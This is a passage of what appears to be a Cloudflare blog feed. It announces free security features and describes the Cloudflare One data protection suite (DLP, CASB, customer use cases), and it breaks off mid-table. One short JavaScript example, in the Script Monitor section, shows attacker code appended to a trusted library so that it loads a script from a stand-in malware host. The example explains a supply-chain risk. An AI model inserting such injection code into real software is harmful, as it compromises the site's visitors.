          </figure><p>With <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>Script Monitor</u></a>, you’ll see <i>all</i> JavaScript assets loaded on the page, not just the ones your developers included. This visibility includes scripts dynamically loaded by other scripts! Once an attacker compromises the library, it is trivial to add a new malicious script without changing the context of the original HTML by instead including new code in the existing included JavaScript asset:</p>
            <pre><code>// Original library code (trusted)
function someLibraryFunction() {
    // useful functionality here
}

// Malicious code added by the attacker
let malScript = document.createElement('script');
malScript.src = 'https://example.com/malware.js';
document.body.appendChild(malScript);</code></pre>
            <p>Script Monitor was essential when the <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk"><u>news broke of the pollyfill.io library</u></a> changing ownership. Script Monitor users had immediate visibility to the scripts loaded on their sites and could quickly and easily understand if they were at risk.</p><p>We’re happy to extend visibility of these scripts to as much of the web as we can by releasing Script Monitor for all customers. Find out how you can get started <a href="https://developers.cloudflare.com/page-shield/detection/monitor-connections-scripts/"><u>here in the docs</u></a>.</p><p>Existing users of Page Shield can immediately filter on the monitored data, knowing whether polyfill.io (or any other library) is used by their app. In addition, we <a href="https://blog.cloudflare.com/automatically-replacing-polyfill-io-links-with-cloudflares-mirror-for-a-safer-internet/"><u>built a polyfill.io rewrite</u></a> in response to the compromised service, which was automatically enabled for Free plans in June 2024.</p>
    <div>
      <h3>Turnstile as a Google Firebase extension </h3>
      <a href="#turnstile-as-a-google-firebase-extension">
        
      </a>
    </div>
    <p>We're excited to announce the <a href="https://developers.cloudflare.com/turnstile/extensions/google-firebase/"><u>Cloudflare Turnstile App Check Provider for Google Firebase</u></a>, which offers seamless integration without the need for manual setup. This new extension allows developers building mobile or web applications on Firebase to protect their projects from bots using Cloudflare’s CAPTCHA alternative. By leveraging Turnstile's bot detection and challenge capabilities, you can ensure that only authentic human visitors interact with your Firebase backend services, enhancing both security and user experience. Cloudflare Turnstile, a privacy-focused CAPTCHA alternative, differentiates between humans and bots without disrupting the user experience. Unlike traditional CAPTCHA solutions, which users often abandon, Turnstile operates invisibly and provides various modes to ensure frictionless user interactions.</p><p>The Firebase App Check extension for Turnstile is easy to integrate, allowing developers to quickly enhance app security with minimal setup. This extension is also free with unlimited usage with Turnstile’s free tier. By combining the strengths of Google Firebase's backend services and Cloudflare’s Turnstile, developers can offer a secure and seamless experience for their users. </p>
    <div>
      <h2>Cloudflare One</h2>
      <a href="#cloudflare-one">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/zero-trust/"><u>Cloudflare One</u></a> is a comprehensive <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/"><u>Secure Access Service Edge (SASE)</u></a> platform designed to protect and connect people, apps, devices, and networks across the Internet. It combines services such as Zero Trust Network Access (ZTNA), Secure Web Gateway (SWG), and more into a single solution. Cloudflare One can help everyone secure people and networks, manage access control, protect against cyber threats, safeguard their data, and improve the performance of network traffic by routing it through Cloudflare’s global network. It replaces traditional security measures by offering a cloud-based approach to secure and streamline access to corporate resources.</p><p>Everyone now has free access to four new products that have been added to Cloudflare One over the past two years:</p><ul><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/"><u>Cloud Access Security Broker (CASB)</u></a> for mitigating SaaS application risk<i>.</i></p></li><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/"><u>Data Loss Prevention (DLP)</u></a> for protecting sensitive data from leaving your network and SaaS applications<i>.</i></p></li><li><p><a href="https://www.cloudflare.com/learning/performance/what-is-digital-experience-monitoring/"><u>Digital Experience Monitoring</u></a> for seeing a user’s experience when they are on any network.</p></li><li><p><a href="https://www.cloudflare.com/network-services/products/magic-network-monitoring/"><u>Magic Network Monitoring</u></a> for seeing all the traffic that flows through your network<i>.</i></p></li></ul><p>This is in addition to the existing network security products already in the Cloudflare One platform:</p><ul><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/"><u>Access</u></a> for verifying users’ identity and only letting them use the applications they’re meant to be using.</p></li><li><p><a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/"><u>Gateway</u></a> for protecting network traffic that both goes out to the public Internet and into your private network.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-networks/"><u>Cloudflare Tunnel</u></a>, our app connectors, which includes both cloudflared and WARP Connector for connecting different applications, servers, and private networks to Cloudflare’s network.</p></li><li><p><a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/"><u>Cloudflare WARP</u></a>, our device agent, for securely sending traffic from a laptop or mobile device to the Internet.</p></li></ul><p>Anyone with a Cloudflare account will automatically receive 50 free seats across all of these products in their Cloudflare One organization. Visit our <a href="https://www.cloudflare.com/plans/zero-trust-services/"><u>Zero Trust &amp; SASE plans page</u></a> for more information about our free products and to learn about our Pay-as-you-go and Contract plans for teams above 50 members.</p>
    <div>
      <h2>Authenticating with Google</h2>
      <a href="#authenticating-with-google">
        
      </a>
    </div>
    <p>The Cloudflare dashboard itself has become a vital resource that needs to be protected, and we spend a lot of time ensuring Cloudflare user accounts do not get compromised.</p><p>To do this, we have increased security by adding additional authentication methods including app-based two-factor authentication (2FA), passkeys, SSO, and Sign in with Apple. Today we’re adding the ability to sign up and sign in with a Google account.</p><p>Cloudflare supports several authentication workflows tailored to different use cases. While SSO and passkeys are the preferred and most secure methods of authentication, we believe that providing authentication factors that are stronger than passwords will fill a gap and raise overall average security for our users. Signing in with Google makes life easier for our users and prevents them from having to remember yet another password when they’re already browsing the web with a Google identity.</p><p>Sign in with Google is based on the <a href="https://oauth.net/2/"><u>OAuth 2.0</u></a> specification, and allows Google to securely share identifying information about a given identity while ensuring that it is Google providing this information, preventing any malicious entities from impersonating Google.</p><p>This means that we can delegate authentication to Google, preventing zero knowledge attacks directly on this Cloudflare identity.</p><p>Upon coming to the Cloudflare Sign In page, you will be presented with the button below. Clicking on it will allow you to register for Cloudflare, and once you are registered, it will allow you to sign in without typing in a password, using any existing protections you have set on your Google account.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6Sse03ivX432bBV01nfyUx/1ce8ace19aa3e4228735d1ca7bd3528c/Screenshot_2024-09-23_at_16.02.49.png" />
            
            </figure><p>With the launch of this capability, Cloudflare now uses its own Cloudflare Workers to provide an abstraction layer for <a href="https://openid.net/developers/how-connect-works/"><u>OIDC</u></a>-compatible identity providers (such as GitHub and Microsoft accounts), which means our users can expect to see more <a href="https://www.cloudflare.com/learning/access-management/what-is-an-identity-provider/"><u>identity provider (IdP)</u></a> connection support coming in the future.</p><p>At this time, only new customers signing up with Google will be able to sign in with their Google account, but we will be implementing this for more of our users going forward, with the ability to link/de-link social login providers, and we will be adding additional social login methods. Enterprise users with an established SSO setup will not be able to use this method at this time, and those with an established SSO setup based on Google Workspace will be forwarded to their SSO flow, as we consider how to streamline the Access and IdP policies that have been set up to lock down your Cloudflare environment.</p><p>If you are new to Cloudflare, and have a Google account, it is easier than ever to start using Cloudflare to protect your websites, build a new service, or try any of the other services that Cloudflare provides.</p>
    <div>
      <h2>A safer Internet</h2>
      <a href="#a-safer-internet">
        
      </a>
    </div>
    <p>One of Cloudflare’s goals has always been to democratize cyber security tools, so everyone can provide content and connect to the Internet safely, even without the resources of large enterprise organizations.</p><p>We have decided to provide a large set of new features for free to all Cloudflare users, covering a wide range of security use cases, for web administrators, network administrators, and cyber security enthusiasts.</p><p><a href="https://dash.cloudflare.com/"><u>Log in to your Cloudflare account</u></a> to start taking advantage of these announcements today. We love feedback on our <a href="https://community.cloudflare.com/"><u>community forums</u></a>, and we commit to improving both existing features and new features moving forward.</p>
    <div>
      <h2>Watch on Cloudflare TV</h2>
      <a href="#watch-on-cloudflare-tv">
        
      </a>
    </div>
    <div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[Data Loss Prevention]]></category>
            <category><![CDATA[Threat Intelligence]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[Leaked Credential Checks]]></category>
            <category><![CDATA[SASE]]></category>
            <guid isPermaLink="false">3hUMWCRTsPTuqyUixn3aXp</guid>
            <dc:creator>Michael Tremante</dc:creator>
            <dc:creator>Reid Tatoris</dc:creator>
        </item>
        <item>
            <title><![CDATA[Cloudflare One for Data Protection]]></title>
            <link>https://blog.cloudflare.com/cloudflare-one-data-protection-announcement/</link>
            <pubDate>Thu, 07 Sep 2023 13:00:35 GMT</pubDate>
            <description><![CDATA[ This blog announces Cloudflare One for Data Protection — our unified suite to protect data everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and AI ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3pZeIACtw7wzkE1aQt7Wbt/8fde767c6c2199f080c529c748b7fbc7/image3.png" />
            
            </figure><p>Data continues to explode in volume, variety, and velocity, and security teams at organizations of all sizes are challenged to keep up. Businesses face escalating risks posed by varied SaaS environments, the emergence of generative <a href="https://www.cloudflare.com/learning/ai/what-is-artificial-intelligence/">artificial intelligence (AI)</a> tools, and the exposure and theft of valuable source code continues to keep <a href="https://www.cloudflare.com/ciso/">CISOs</a> and Data Officers up at night.  </p><p>Over the past few years, Cloudflare has launched capabilities to help organizations navigate these risks and <a href="https://www.cloudflare.com/learning/cloud/what-is-dspm/">gain visibility and controls over their data</a> — including the launches of our <a href="/inline-dlp-ga/">data loss prevention (DLP)</a> and <a href="/casb-ga/">cloud access security broker (CASB)</a> services in the fall of 2022.</p>
    <div>
      <h2>Announcing Cloudflare One’s data protection suite</h2>
      <a href="#announcing-cloudflare-ones-data-protection-suite">
        
      </a>
    </div>
    <p>Today, we are building on that momentum and announcing <a href="https://www.cloudflare.com/zero-trust/solutions/data-protection">Cloudflare One for Data Protection</a> — our unified suite to <a href="https://www.cloudflare.com/learning/security/what-is-information-security/">protect data</a> everywhere across web, SaaS, and private applications. Built on and delivered across our entire global network, Cloudflare One’s data protection suite is architected for the risks of modern coding and increased usage of AI.</p><p>Specifically, this suite converges capabilities across Cloudflare’s <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/">DLP</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">CASB</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">Zero Trust network access (ZTNA)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">secure web gateway (SWG)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">remote browser isolation (RBI)</a>, and <a href="https://www.cloudflare.com/learning/email-security/what-is-email-security/">cloud email security</a> services onto a single platform for simpler management. All these services are available and packaged now as part of <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a>, our <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">SASE</a> platform that converges security and network connectivity services.</p><p>A <a href="http://cfl.re/data-protection-roadmap-preview-blog">separate blog post published today</a> looks back on <i>what</i> technologies and features we delivered over the past year and previews new functionality that customers can look forward to.</p><p>In this blog, we focus more on <i>what impact</i> those technologies and features have for customers in addressing modern data risks — with examples of practical use cases. We believe that Cloudflare One is uniquely positioned to deliver better data protection that addresses modern data risks. And by “better,” we mean:</p><ul><li><p>Helping security teams be <b>more effective</b> protecting data by simplifying inline and API connectivity together with policy management</p></li><li><p>Helping employees be <b>more productive</b> by ensuring fast, reliable, and consistent user experiences</p></li><li><p>Helping organizations be <b>more agile</b> by innovating rapidly to meet evolving data security and privacy requirements</p></li></ul>
    <div>
      <h2>Harder than ever to secure data</h2>
      <a href="#harder-than-ever-to-secure-data">
        
      </a>
    </div>
    <p>Data spans more environments than most organizations can keep track of. In conversations with customers, three distinctly modern risks stick out:</p><ol><li><p><b>The growing diversity of cloud and SaaS environments:</b> The apps where knowledge workers spend most of their time — like cloud email inboxes, shared cloud storage folders and documents, SaaS productivity and collaboration suites like Microsoft 365 — are increasingly targeted by threat actors for <a href="https://www.cloudflare.com/learning/security/what-is-data-exfiltration/">data exfiltration</a>.</p></li><li><p><b>Emerging AI tools:</b> Business leaders are concerned about users oversharing sensitive information with opaque <a href="https://www.cloudflare.com/learning/ai/what-is-large-language-model/">large language model tools</a> like ChatGPT, but at the same time, want to leverage the benefits of AI.</p></li><li><p><b>Source code exposure or theft</b>: Developer code fuels digital business, but that same high-value source code can be exposed or targeted for theft across many developer tools like GitHub, including in plain sight locations like public repositories.</p></li></ol><p>These latter two risks, in particular, are already intersecting. Companies like <a href="https://www.businessinsider.com/chatgpt-companies-issued-bans-restrictions-openai-ai-amazon-apple-2023-7">Amazon, Apple, Verizon, Deutsche Bank, and more</a> are blocking employees from using tools like ChatGPT for fear of losing confidential data, and <a href="https://www.forbes.com/sites/siladityaray/2023/05/02/samsung-bans-chatgpt-and-other-chatbots-for-employees-after-sensitive-code-leak/?sh=28ba8bf96078">Samsung</a> recently had an engineer accidentally upload sensitive code to the tool. As organizations prioritize new digital services and experiences, developers face mounting pressure to work faster and smarter. AI tools can help unlock that productivity, but the long-term consequences of oversharing sensitive data with these tools is still unknown.</p><p>All together, data risks are only primed to escalate, particularly as organizations accelerate digital transformation initiatives with hybrid work and development continuing to expand attack surfaces. At the same time, regulatory compliance will only become more demanding, as more countries and states adopt more stringent data privacy laws.</p><p>Traditional DLP services are not equipped to keep up with these modern risks. A combination of high setup and operational complexity plus negative user experiences means that, in practice, DLP controls are often underutilized or bypassed entirely. Whether deployed as a standalone platform or integrated into security products or SaaS applications, DLP products can often become expensive shelfware. And backhauling traffic through on-premise data protection hardware – whether, DLP, firewall and SWG appliances, or otherwise — create costs and slow user experiences that hold businesses back in the long run.</p>
    <div>
      <h3>Figure 1: Modern data risks</h3>
      <a href="#figure-1-modern-data-risks">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6f0YWGx04DZ3Xif9A4MYJE/ce203c56220b49e5173473e8a819fd9d/image2.jpg" />
            
            </figure>
    <div>
      <h2>How customers use Cloudflare for data protection</h2>
      <a href="#how-customers-use-cloudflare-for-data-protection">
        
      </a>
    </div>
    <p>Today, customers are increasingly turning to Cloudflare to address these data risks, including a Fortune 500 natural gas company, a major US job site, a regional US airline, an Australian healthcare company and more. Across these customer engagements, three use cases are standing out as common focus areas when deploying Cloudflare One for data protection.</p>
    <div>
      <h3><i>Use case #1: Securing AI tools and developer code (Applied Systems)</i></h3>
      <a href="#use-case-1-securing-ai-tools-and-developer-code-applied-systems">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/case-studies/applied-systems">Applied Systems</a>, an insurance technology &amp; software company, recently deployed Cloudflare One to <a href="https://www.cloudflare.com/ai-security/">secure data in AI environments</a>.</p><p>Specifically, the company runs the public instance of ChatGPT in an isolated browser, so that the security team can apply <a href="https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/isolation-policies/#policy-settings">copy-paste blocks</a>: preventing users from copying sensitive information (including developer code) from other apps into the AI tool. According to Chief Information Security Officer Tanner Randolph, “We wanted to let employees take advantage of AI while keeping it safe.”</p><p>This use case was just one of several Applied Systems tackled when migrating from Zscaler and Cisco to Cloudflare, but we see a growing interest in <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">securing AI</a> and developer code among our customers.</p>
    <div>
      <h3><i>Use case #2: Data exposure visibility</i></h3>
      <a href="#use-case-2-data-exposure-visibility">
        
      </a>
    </div>
    <p>Customers are leveraging Cloudflare One to regain visibility and controls over data exposure risks across their sprawling app environments. For many, the first step is analyzing <a href="https://developers.cloudflare.com/cloudflare-one/insights/analytics/access/">unsanctioned app usage</a>, and then taking steps to allow, block, isolate, or apply other controls to those resources. A second and increasingly popular step is scanning SaaS apps for misconfigurations and sensitive data <a href="/casb-dlp/">via a CASB and DLP</a> service, and then taking prescriptive steps to remediate via SWG policies.</p><p>A UK ecommerce giant with 7,5000 employees turned to Cloudflare for this latter step. As part of a broader <a href="/descaler-program-update/">migration strategy from Zscaler to Cloudflare</a>, this company quickly set up API integrations between its SaaS environments and Cloudflare’s CASB and began scanning for misconfigurations. Plus, during this integration process, the company was able to sync DLP policies with <a href="/cloudflare-dlp-mip/">Microsoft Pureview Information Protection sensitivity labels</a>, so that it could use its existing framework to prioritize what data to protect. All in all, the company was able to begin identifying data exposure risks within a day.</p>
    <div>
      <h3><i>Use case #3: Compliance with regulations</i></h3>
      <a href="#use-case-3-compliance-with-regulations">
        
      </a>
    </div>
    <p>Comprehensive data regulations like <a href="https://www.cloudflare.com/learning/privacy/what-is-the-gdpr/">GDPR</a>, <a href="https://www.cloudflare.com/learning/privacy/what-is-the-ccpa/">CCPA</a>, <a href="https://www.cloudflare.com/learning/privacy/what-is-hipaa-compliance/">HIPAA</a>, and <a href="https://www.ftc.gov/business-guidance/resources/how-comply-privacy-consumer-financial-information-rule-gramm-leach-bliley-act">GLBA</a> have been in our lives for some time now. But new laws are quickly emerging: for example, <a href="https://iapp.org/resources/article/us-state-privacy-legislation-tracker/">11 U.S. states</a> now have comprehensive privacy laws, up from just 3 in 2021. And updates to existing laws like <a href="https://www.cloudflare.com/learning/privacy/what-is-pci-dss-compliance/">PCI DSS</a> now include stricter, more expansive requirements.</p><p>Customers are increasingly turning to Cloudflare One for compliance, in particular by ensuring they can monitor and protect regulated data (e.g. financial data, health data, <a href="https://www.cloudflare.com/learning/privacy/what-is-pii/">PII</a>, <a href="/edm-beta/">exact data matches</a>, and more). Some common steps include first, detecting and applying controls to sensitive data <a href="https://www.cloudflare.com/zero-trust/products/dlp/">via DLP</a>, next, maintaining detailed audit trails via logs and further SIEM analysis, and finally, reducing overall risk with a comprehensive <a href="https://www.cloudflare.com/learning/security/glossary/what-is-zero-trust/">Zero Trust</a> security posture.</p><p>Let’s look at a concrete example. One Zero Trust best practice that is increasingly required is <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/">multi-factor authentication (MFA)</a>. In the payment cards industry, PCI DSS <a href="https://docs-prv.pcisecuritystandards.org/PCI%20DSS/Standard/PCI-DSS-v4_0.pdf">v4.0</a>, which takes effect in 2025, requires that requests to MFA be enforced for every access request to the cardholder data environment, for every user and for every location – including cloud environments, on-prem apps, workstations and more. (requirement 8.4.2). Plus, those MFA systems must be configured to prevent misuse – including replay attacks and bypass attempts – and must require at least <a href="https://www.cloudflare.com/learning/access-management/what-is-two-factor-authentication/">two different factors</a> that must be successful (requirement 8.5). To help organizations comply with both of these requirements, Cloudflare helps organizations <a href="https://developers.cloudflare.com/cloudflare-one/policies/access/mfa-requirements/">enforce MFA</a> across all apps and users – and in fact, we use our same services to <a href="/how-cloudflare-implemented-fido2-and-zero-trust/">enforce hard key authentication</a> for our own employees.</p>
    <div>
      <h3>Figure 2: Data protection use cases</h3>
      <a href="#figure-2-data-protection-use-cases">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5GTjdlDlstogJwsnIMjPJM/2f69aee02d3fa0a03c86ab097ec440f7/image1.png" />
            
            </figure>
    <div>
      <h2>The Cloudflare difference</h2>
      <a href="#the-cloudflare-difference">
        
      </a>
    </div>
    <p>Cloudflare One’s data protection suite is built to stay at the forefront of modern data risks to address these and other evolving use cases.</p><p>With Cloudflare, DLP is not just integrated with other typically distinct security services, like CASB, SWG, ZTNA, RBI, and <a href="https://www.cloudflare.com/zero-trust/products/email-security/">email security</a>, but converged onto a single platform with one control plane and one interface. Beyond the acronym soup, our network architecture is really what enables us to help organizations be more effective, more productive, and more agile with protecting data.</p><p>We simplify connectivity, with flexible options for you to send traffic to Cloudflare for enforcement. Those options include <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/">API-based scans</a> of SaaS suites for misconfigurations and sensitive data. Unlike solutions that require security teams to get full app permissions from IT or business teams, Cloudflare can find risk exposure with read-only app permissions. <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/agentless/">Clientless deployments</a> of ZTNA <a href="https://developers.cloudflare.com/cloudflare-one/applications/configure-apps/">to secure application access</a> and of <a href="https://developers.cloudflare.com/cloudflare-one/policies/browser-isolation/setup/clientless-browser-isolation/">browser isolation</a> to control data within websites and apps are scalable for all users — employees and third-parties like contractors — for the largest enterprises. And when you do want to forward proxy traffic, Cloudflare offers <a href="https://developers.cloudflare.com/cloudflare-one/connections/connect-devices/warp/">one device client</a> with self-enrollment permissions or wide area network on-ramps across security services. With so many practical ways to deploy, your data protection approach will be effective and functional — not shelfware.</p><p>Just like your data, our global network is everywhere, now spanning over 300 cities in over 100 countries. We have proven that we enforce controls <a href="/spotlight-on-zero-trust/">faster than vendors like Zscaler, Netskope, and Palo Alto Networks</a> — all with single-pass inspection. We ensure security is quick, reliable, and unintrusive, so you can layer on data controls without disruptive work productivity.</p><p>Our <a href="/building-cloudflare-on-cloudflare/">programmable network architecture</a> enables us to build new capabilities quickly. And we rapidly adopt new security standards and protocols (like IPv6-only connections or HTTP/3 encryption) to ensure data protection remains effective. Altogether, this architecture equips us to evolve alongside changing data protection use cases, like protecting code in AI environments, and quickly deploy AI and <a href="https://www.cloudflare.com/learning/ai/what-is-machine-learning/">machine learning models</a> across our network locations to enforce higher precision, context-driven detections.</p>
    <div>
      <h3>Figure 3: Unified data protection with Cloudflare</h3>
      <a href="#figure-3-unified-data-protection-with-cloudflare">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/73FFaciX34hSOgWf5tlL9M/68b41d876da9c6d7e6e7e99755b4b3d8/image4.png" />
            
            </figure>
    <div>
      <h2>How to get started</h2>
      <a href="#how-to-get-started">
        
      </a>
    </div>
    <p>Modern data risks demand modern security. We feel that Cloudflare One’s unified data protection suite is architected to help organizations navigate their priority risks today and in the future — whether that is securing developer code and AI tools, regaining visibility over SaaS apps, or staying compliant with evolving regulations.</p><p>If you’re ready to explore how Cloudflare can protect your data, <a href="https://www.cloudflare.com/products/zero-trust/plans/enterprise/">request a workshop</a> with our experts today.</p><p>Or to learn more about how Cloudflare One protects data, read today’s <a href="https://www.cloudflare.com/press-releases/2023/cloudflare-announces-unified-data-protection-suite-to-address-the-risks-of/">press release</a>, visit <a href="https://www.cloudflare.com/zero-trust/solutions/data-protection">our website</a>, or dive deeper with our <a href="/cloudflare-one-data-protection-roadmap-preview/">accompanying technical blog</a>.</p><p>***</p><ol><li><p><a href="https://www.gitguardian.com/state-of-secrets-sprawl-report-2023">The State of Secrets Sprawl 2023, GitGuardian</a></p></li><li><p><a href="https://www.salesforce.com/news/stories/generative-ai-statistics/">Top Generative AI Statistics for 2023, Salesforce</a></p></li><li><p><a href="https://www.ibm.com/reports/data-breach">Cost of a Data Breach Report 2023, IBM</a></p></li><li><p><a href="https://salt.security/state-of-the-ciso-2023">2023 “State of the CISO” report, conducted by Global Survey</a></p></li><li><p><a href="https://unctad.org/page/data-protection-and-privacy-legislation-worldwide">United Nations Conference on Trade &amp; Development</a></p></li><li><p><a href="https://iapp.org/resources/article/us-state-privacy-legislation-tracker/">International Association of Privacy Professionals (IAPP)</a></p></li></ol><p></p><p></p> ]]></content:encoded>
            <category><![CDATA[Cloudflare One]]></category>
            <category><![CDATA[DLP]]></category>
            <category><![CDATA[CASB]]></category>
            <category><![CDATA[Zero Trust]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Product News]]></category>
            <category><![CDATA[Privacy]]></category>
            <guid isPermaLink="false">QhwALHkPakTUyrr9vQo8k</guid>
            <dc:creator>James Chang</dc:creator>
        </item>
        <item>
            <title><![CDATA[What’s next for Cloudflare One’s data protection suite]]></title>
            <link>https://blog.cloudflare.com/cloudflare-one-data-protection-roadmap-preview/</link>
            <pubDate>Thu, 07 Sep 2023 13:00:31 GMT</pubDate>
            <description><![CDATA[ Cloudflare One just launched its data protection suite. This blog previews new functionality to protect data and code in SaaS environments with our DLP and CASB services and looks back on what we have built over the past year ]]></description>
            <content:encoded><![CDATA[ <p></p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4WClMGClAUrNY0rHmGzotr/6e13a6250104ebc9b9b6cdff4a34128d/image1-2.png" />
            
            </figure><p>Today, we announced Cloudflare One for Data Protection — a unified suite to protect data everywhere across web, SaaS, and private applications. This suite converges capabilities including our <a href="https://www.cloudflare.com/learning/access-management/what-is-dlp/">data loss prevention (DLP)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-a-casb/">cloud access security broker (CASB)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-ztna/">Zero Trust network access (ZTNA)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-a-secure-web-gateway/">secure web gateway (SWG)</a>, <a href="https://www.cloudflare.com/learning/access-management/what-is-browser-isolation/">remote browser isolation (RBI)</a>, and <a href="https://www.cloudflare.com/learning/email-security/what-is-email-security/">cloud email security</a> services. The suite is available and packaged now as part of <a href="https://www.cloudflare.com/cloudflare-one/">Cloudflare One</a>, our <a href="https://www.cloudflare.com/learning/access-management/what-is-sase/">SASE</a> platform.</p><p>In the <a href="https://cflr.re/data-protection-announcement-blog">announcement post</a>, we focused on how the data protection suite helps customers navigate modern data risks, with recommended use cases and real-world customer examples.</p><p>In this companion blog post, we recap the capabilities built into the Cloudflare One suite over the past year and preview new functionality that customers can look forward to. This blog is best for practitioners interested in protecting data and SaaS environments using Cloudflare One.</p>
    <div>
      <h2>DLP &amp; CASB capabilities launched in the past year</h2>
      <a href="#dlp-casb-capabilities-launched-in-the-past-year">
        
      </a>
    </div>
    <p>Cloudflare launched both <a href="/inline-dlp-ga/">DLP</a> and <a href="/casb-ga/">CASB</a> services in September 2022, and since then have rapidly built functionality to meet the growing needs of our organizations of all sizes. Before previewing how these services will evolve, it is worth recapping the many enhancements added in the past year.</p><p>Cloudflare’s <a href="/inline-dlp-ga/">DLP</a> solution helps organizations detect and protect sensitive data across their environment based on its several characteristics. DLP controls can be critical in preventing (and detecting) damaging leaks and ensuring compliance for regulated classes of data like financial, health, and <a href="https://www.cloudflare.com/learning/privacy/what-is-pii/">personally identifiable</a> information.</p><p>Improvements to DLP detections and policies can be characterized by three major themes:</p><ul><li><p><b>Customization:</b> making it easy for administrators to design DLP policies with the flexibility they want.</p></li><li><p><b>Deep detections:</b> equipping administrators with increasingly granular controls over what data they protect and how.</p></li><li><p><b>Detailed detections:</b> providing administrators with more detailed visibility and logs to analyze the efficacy of their DLP policies.</p></li></ul><p>Cloudflare’s <a href="/casb-ga/">CASB</a> helps organizations connect to, scan, and monitor third-party SaaS applications for misconfigurations, improper data sharing, and other security risks — all via lightweight API integrations. In this way, organizations can regain visibility and controls over their growing investments in SaaS apps.</p><p>CASB product enhancements can similarly be summarized by three themes:</p><ul><li><p><b>Expanding API integrations:</b> Today, our CASB integrates with <a href="https://developers.cloudflare.com/cloudflare-one/applications/scan-apps/casb-integrations/">18 of the most popular SaaS apps</a> — Microsoft 365 (including OneDrive), Google Workspace (including Drive), Salesforce, GitHub, and more. Setting up these API integrations takes fewer clicks than first-generation CASB solutions, with comparable coverage to other vendors in the <a href="https://www.cloudflare.com/learning/access-management/security-service-edge-sse/">Security Services Edge (SSE)</a> space.</p></li><li><p><b>Strengthening findings of CASB scans:</b> We have made it easier to remediate the misconfigurations identified by these CASB scans with both prescriptive guides and in-line policy actions built into the dashboard.</p></li><li><p><b>Converging CASB &amp; DLP functionality:</b> We started enabling organizations to <a href="/casb-dlp/">scan SaaS apps for sensitive data, as classified by DLP policies</a>. For example, this helps organizations detect when credit cards or social security numbers are in Google documents or spreadsheets that have been made publicly available to anyone on the Internet.</p></li></ul><p>This last theme, in particular, speaks to the value of unifying data protection capabilities on a single platform for simple, streamlined workflows. The below table highlights some major capabilities launched since our general availability announcements last September.</p>
    <div>
      <h3>Table 1: Select DLP and CASB capabilities shipped since 2022 Q4</h3>
      <a href="#table-1-select-dlp-and-casb-capabilities-shipped-since-2022-q4">
        
      </a>
    </div>
    
<table>
<thead>
  <tr>
    <th><span>Theme</span></th>
    <th><span>Capability</span></th>
    <th><span>Description</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>DLP: Customizability</span></td>
    <td><a href="http://staging.blog.mrk.cfdata.org/cloudflare-dlp-mip/"><span>Microsoft Information Protection labels integration</span></a></td>
    <td><span>After a quick API integration, Cloudflare syncs continuously with the Microsoft Information Protection (MIP) labels you already use to streamline how you build DLP policies.</span></td>
  </tr>
  <tr>
    <td><a href="http://staging.blog.mrk.cfdata.org/custom-dlp-profiles/"><span>Custom DLP profiles</span></a></td>
    <td><span>Administrators can create custom detections using the same regex policy builder used across our entire Zero Trust platform for a consistent configuration experience across services.</span></td>
  </tr>
  <tr>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/advanced-settings/"><span>Match count controls</span></a></td>
    <td><span>Administrators can set minimum thresholds for the number of times a detection is made before an action (like block or log) is triggered. This way, customers can create policies that allow individual transactions but block up/downloads with high volumes of sensitive data.</span></td>
  </tr>
  <tr>
    <td><span>DLP: Deepening detection</span></td>
    <td><a href="https://developers.cloudflare.com/cloudflare-one/policies/data-loss-prevention/dlp-profiles/advanced-settings/"><span>Context analysis</span></a></td>
    <td><span>Context analysis helps reduce false positive detections by analyzing proximity keywords (for example: seeing “expiration date” near a credit card number increases the likelihood of triggering a detection).</span></td>
  </tr>
  <tr>
